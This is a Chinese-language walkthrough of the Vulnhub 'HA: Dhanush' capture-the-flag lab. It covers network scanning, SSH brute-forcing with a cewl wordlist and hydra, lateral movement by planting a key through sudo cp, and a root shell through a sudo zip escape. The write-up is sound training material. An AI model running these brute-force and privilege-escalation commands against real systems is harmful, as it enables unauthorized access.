Dhanush
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo netdiscover -i eth1 -r 192.168.187.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 2 120 VMware, Inc.
192.168.187.155 00:0c:29:ab:6e:4f 2 120 VMware, Inc.
192.168.187.254 00:50:56:e2:20:55 1 60 VMware, Inc.
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo nmap -sS -sV -sC -p- 192.168.187.155 -oN nmap_full_scan 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-07-12 02:46 EDT
Nmap scan report for 192.168.187.155
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Dhanush
|_http-server-header: Apache/2.4.29 (Ubuntu)
65345/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:2f:3d:dd:ac:42:d4:d5:de:ec:9b:19:0b:45:3e:13 (RSA)
| 256 89:02:8d:a5:e0:75:a5:34:3b:52:3a:6c:d1:f4:05:da (ECDSA)
|_ 256 ea:af:62:07:73:d0:d5:1e:fb:a9:12:62:34:27:52:d9 (ED25519)
MAC Address: 00:0C:29:AB:6E:4F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ curl http://192.168.187.155/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.187.155 Port 80</address>
</body></html>
目标不存在robots.txt文件
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ nikto -h http://192.168.187.155
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.187.155
+ Target Hostname: 192.168.187.155
+ Target Port: 80
+ Start Time: 2023-07-12 02:48:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 15a4, size: 596d81d0365ae, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-07-12 02:48:42 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto工具没有扫描出有价值的信息。
目录扫描没有任何收获。
创建字典,看是否可以破解ssh用户名与口令:
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ cewl -d 3 http://192.168.187.155 -w dict.txt
CeWL 5.5.2 (Grouping) Robin Wood ([email protected]) (https://digi.ninja/)
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ wc -l dict.txt
114 dict.txt
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ hydra -L dict.txt -P dict.txt ssh://192.168.187.155 -s 65345
破解得到用户名密码为pinak/Gandiv
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ ssh [email protected] -p 65345
The authenticity of host '[192.168.187.155]:65345 ([192.168.187.155]:65345)' can't be established.
ED25519 key fingerprint is SHA256:MZF9Ir9Jya9Ybbdt2/YwEoX+fcFSl7U+HZU/4UcvdrY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.187.155]:65345' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Wed Feb 15 05:02:20 2023 from 10.1.1.143
pinak@ubuntu:~$ ls -alh
提权
pinak@ubuntu:~$ sudo -l
Matching Defaults entries for pinak on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pinak may run the following commands on ubuntu:
(sarang) NOPASSWD: /bin/cp
pinak@ubuntu:~$
pinak@ubuntu:~$ sudo -u sarang /bin/cp id_rsa.pub /home/sarang/.ssh/authorized_keys
pinak@ubuntu:~$ ssh [email protected] -p 65345
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Feb 15 06:08:49 2023 from 127.0.0.1
根据pinak的.bash_history提示,将其id_rsa.pub文件拷贝到sarang用户的authorized_keys,这样就可以利用其私钥登录sarang的shell了。
sarang@ubuntu:~$ sudo -l
Matching Defaults entries for sarang on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sarang may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/zip
sarang@ubuntu:~$ cd /tmp
sarang@ubuntu:/tmp$ TF=$(mktemp -u)
sarang@ubuntu:/tmp$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
# cd /root
# ls -alh
total 24K
drwx------ 3 root root 4.0K Nov 8 2019 .
drwxr-xr-x 22 root root 4.0K Nov 8 2019 ..
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 1.5K Nov 8 2019 flag.txt
drwxr-xr-x 3 root root 4.0K Nov 7 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
# cat flag.txt
@p
@@@.
@@@@@
@@@@@@@
*"`]@P ^^
]@P
]@P
,,,, ]@P ,,gg,,
g@@@@@@@@@b ]@P ,@@@@@@@@@@g,
,@@@@@@BNPPNB@@@@@@@@@@@@@@@@P**PNB@@@@@w
g@@@@P^` %NNNNN@NNNNNP *B@@@g
g@@@P` -@ "B@@w
,@@@` ]@ %@@,
@@P- ]@ *@@,
,@@" ]@ *B@
,@N" y@@B %@,
,, g@P- ]@@@P *Bg ,gg
@@@@$,,,,,,,,,,,,,,,,,,,,,,,,,,ggggg@@@@wwwwwwwwwgggggggggww==========mm4NNN"
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Nisha Sharma : https://in.linkedin.com/in/nishasharmaa
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
这样就拿到了root flag和root shell.
经验教训
- 本靶机的关键在于生成字典,然后利用hydra破解ssh用户名和密码